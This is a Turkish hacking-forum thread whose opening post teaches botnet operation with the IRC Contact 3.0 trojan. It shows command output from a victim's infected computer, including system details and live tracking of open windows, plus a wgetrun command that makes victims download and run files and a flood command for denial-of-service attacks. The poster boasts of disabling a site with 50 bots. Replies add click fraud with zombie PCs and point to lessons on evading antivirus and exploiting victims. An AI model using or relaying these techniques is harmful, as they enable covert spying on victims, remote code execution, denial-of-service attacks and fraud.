IRC Trojan **( Botnet )**Forumda botnet ile ilgili bilgi isteyenler cogalmıstı.Dayanamadım üye oldum ben de bir botnet kullanıcısıyım.Umarım işinize yarar bilgilerdir..Öncelikle botnet nedir? Bu konuda botnet kurmanın nasıl olduğu anlatılmaktadır; botnet kurulmasına olanak sağlayacak
Konu Impactus tarafından açılmış, 46062 kişi tarafından görüntülenip, 19 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Çırak
![]() Kayıt Tarihi: Feb 2007
Üye numarası: #108135
Karma etkisi: 7
![]() ![]() Karma: 116
|
Forumda botnet ile ilgili bilgi isteyenler cogalmıstı.Dayanamadım üye oldum ben de bir botnet kullanıcısıyım.Umarım işinize yarar bilgilerdir..Öncelikle botnet nedir?
""""Bu konuda botnet kurmanın nasıl olduğu anlatılmaktadır; botnet kurulmasına olanak sağlayacak programlar yer almaz ; bilgilendirme amaçlıdır.""" En basit acıklamasıyla,kurbana yedirdiğiniz trojanın kendine port acarak backdoor tabiri ile irc serverlarına bağlanması. Neden botnet? -Kullanımı cok basit ve zahmetsizdir.Baglanamama derdi yoktur.Siz sifrenizi yazarsınız sadece kontrol sizdedir.Ayrıcı aynı anda bircok bilgisayarı yönetme imkanı saglar. Gelelim simdi botnet'e.. Sizlere IRC Contact 3.0'ı anlatacagım. Gayet basit bir program. Mantıgı diger spyware/trojan programlarıyla aynı.Ayarlarınızı belirleyip hangi server hangi kanala girmesini istediginizi belirtip server'ı olusturuyoruz.Ama server seçerken Undernet vb. kolay girilen serverları tercih edin. Simdi size kendi zombilerimden biri ile neler yapabilecegimi gosterecegim.. Oncelikle belirledigimiz sifreyi kanalımızdaki zombimizin ozel penceresine yazıyoruz. Sifreyi yazdıgımızda bize: <Wardom> Master logged on - IrcContact 3.0 by Impactus <Wardom> Commands list: cmdlist diye login oldugumuzu gosteren bir yazı geliyor.Eger cmdlist yazdıgımız taktirde butun komutları bize gosteriyor. Kurbanın Pcsi hakkında bilgi istiyoruz.yine özele: -Getinfo yazıyoruz.. Operative System: Microsoft Windows XP 5.1 - Service Pack 1 <Wardom> Computer Name: NATY User Name: outro Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=119365 <Wardom> Processor: INTEL PENTIUM Speed: 2.26 GHz Memory usage: 105/119Mb (88%) <Wardom> Drives: C:\ [Fixed] Used: 10.5/38.3GB (27%); D:\ [CD-ROM] <Wardom> IP: *** (IP not detected correctly, if you want to download files and you know the IP, type ipset <IP>) <Wardom> Windows is running for 1 hours and 28 minutes <Wardom> The active Window title is: Hattrick - Microsoft Internet Explorer Bilgisayarın özellikleri o an ne yaptıgı olmak uzere ipsi dahil herseyi bize gosteriyor. Notify wins dedigimiz takirde o anki kurbanın yaptıgı seyleri an ve an okuyabiliyoruz. <Wardom> Notify Wins: ENABLED <Wardom> [Hattrick - Microsoft Internet Explorer] <Wardom> [Bekzilla, gurhan coban - Conversa] <Wardom> [Hattrick - Microsoft Internet Explorer] Ve en guzel seye geliyoruz.Kurbanın pcsine istedigimiz seyi indirip calıstırabiliyorz!! aynen trojan downloader gibi.. bunun icin wgetrun komutunu kullanıyoruz. wgetrun siteadı.com dosyanın adı Sitelere saldırı yapabilirsiniz evet yanlıs duymadınız flood dos saldırılarını IRC Contact ile yapabiliriz flood ip dakika : flood 164.35.***.. 50 yaptıgımızda 50 saniye boyunca flood saldırısı yapar buraya sitenin ipsini yazarak saldırımızı etkili hale getirebiliriz.50 tane botla kısa surede olsa bir siteyi kullanılmaz hale getirmistim. Arkadaslar umarım faydalı olmustur komutları kısa kestim zaten hepsi iicnde mevcut cmdlist yazmanız yeterli. Düzenleyen m3hm3t : 22-09-2010 at 00:32. |
|
|
|
|
#2 |
|
Çırak
![]() Kayıt Tarihi: Feb 2007
Üye numarası: #109407
Karma etkisi: 0
![]() Karma: 10
|
S.a saol emeğine sağlık. bana bi ulasabilirsen abi cok makbule gecer.
Düzenleyen PheNoMeN : 19-02-2007 at 07:25. Sebep: Msn yasak. |
|
|
|
|
#3 |
|
Cool Çırak
![]() Kayıt Tarihi: Dec 2004
Üye numarası: #498
|
ehueheuhue botun yaptığı farketmezzzz mühim olan yeni veya güncel exploit :>
bulun gerisini sallayın,yapalım bilmemkaç k bot hehehehe |
|
|
|
|
#4 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Jan 2007
Üye numarası: #103998 Yer: GABAR'da PUsU da
Karma etkisi: 38
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 3204
|
ya ben bunlara sıcak bakmıyorum ya pek bir işe de yaramz zannedersem
|
|
|
|
|
#5 |
|
Banned
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #2687 Yer: 'im şişelerin dibi
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 824732
|
nedir bu
saol emegine saglık botlar düşmesin hemen :d |
|
|
|
|
#6 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #2353
Karma etkisi: 8
|
Arkadaşlar Eskidiyse yenisini koyunda sizinkileride görelim. Kişiye özel program yazmayla olmuyo burası paylaşım sitesi. Adı üstünde PAYLAŞMAK!
|
|
|
|
|
#7 |
|
Cool Çırak
![]() Kayıt Tarihi: Apr 2005
Üye numarası: #11099
|
cankuş eline saglık bide resin veya videolu anlatssan benim gibi kazmalar zor anlarda
|
|
|
|
|
#8 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Nov 2004
Üye numarası: #433 Yer: CeheNNemiN db'sinden
Karma etkisi: 1854
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 184521
|
Arkadaşlar bu m3hm3t in yazdığı warbbot la aynı. bu hiç bir işe yaramaz diyenlere diyorum bu ve benzeri ama gerçekten çalışan (warbot gibi) bir programla çok şey yapabilirsin. düşünün 100 kişiye yedirdiniz. eline farklı ipden 100 bilgisayar geçiyor. bunlarla sitelere ddos flood çekersiniz. kendi siteniz olduğunu farz edin ozaman da bu 100 zombie pc ile hergün 1 kez tıklasanız reklamlara 1 ayda deli gibi para basarsınız ve bu bu şekilde gider. Ha bu arada ben bunun çalışanını nerden bulurum bunu avlar tanıyor derseniz 1st class diye bir yer var wardomda orada bi öğretmen var m3hm3t adında işte o adamın yazdığı warbot 3 var ve undedect etmeyide öğretyor siteden exploite ile insanların pclerine dosya yüklemeyide öğretiyor oraya üye olun ve sizde para ve bilgi kazanın. hepinizi öptüm.
|
|
|
|
|
#9 |
|
Çırak
![]() Kayıt Tarihi: Apr 2007
Üye numarası: #118329
|
nasıL kuLLıcaz tam oLarak anLatsaydın daha iyi oLurdu..
|
|
|
|
|
#10 |
|
Çırak
![]() Kayıt Tarihi: Jul 2007
Üye numarası: #133239
|
Güzel Çalısma
|
|
|
|
|
#11 |
|
Çırak
![]() Kayıt Tarihi: Sep 2007
Üye numarası: #141603
|
slm ya ben buprogramı indirdim çook da merak ediyorum baya okudum ama yapamadım bana yardımcı olurmusunuz ilginiz için tşkler msn=giyotin_anonim@hotmail.com eklerseniz sevinirim
)![]() |
|
|
|
|
#12 |
|
Çırak
![]() Kayıt Tarihi: Jan 2008
Üye numarası: #180558 Yer: istanbul / kAyNaRcA
|
kukLLanımı kOLay
|
|
|
|
|
#13 |
|
Çırak
![]() Kayıt Tarihi: Sep 2006
Üye numarası: #89693 Yer: YER[6]
|
lamerlerin yeni uğrası olacak botnet
![]() |
|
|
|
|
#14 | |
|
Çırak
![]() Kayıt Tarihi: Feb 2008
Üye numarası: #193617
|
Alıntı:
Düzenleyen m3hm3t : 21-12-2010 at 04:53. Sebep: yazım hatası |
|
|
|
|
|
#15 |
|
Çırak
![]() Kayıt Tarihi: Mar 2008
Üye numarası: #203533
|
arkadaşlar yardıma ihtiyacım var
sürekli kanala bot net sokuyolar bunun nasıl önüne gecebilirim yardımcı olacak arkadaşları bekliyorum. |
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|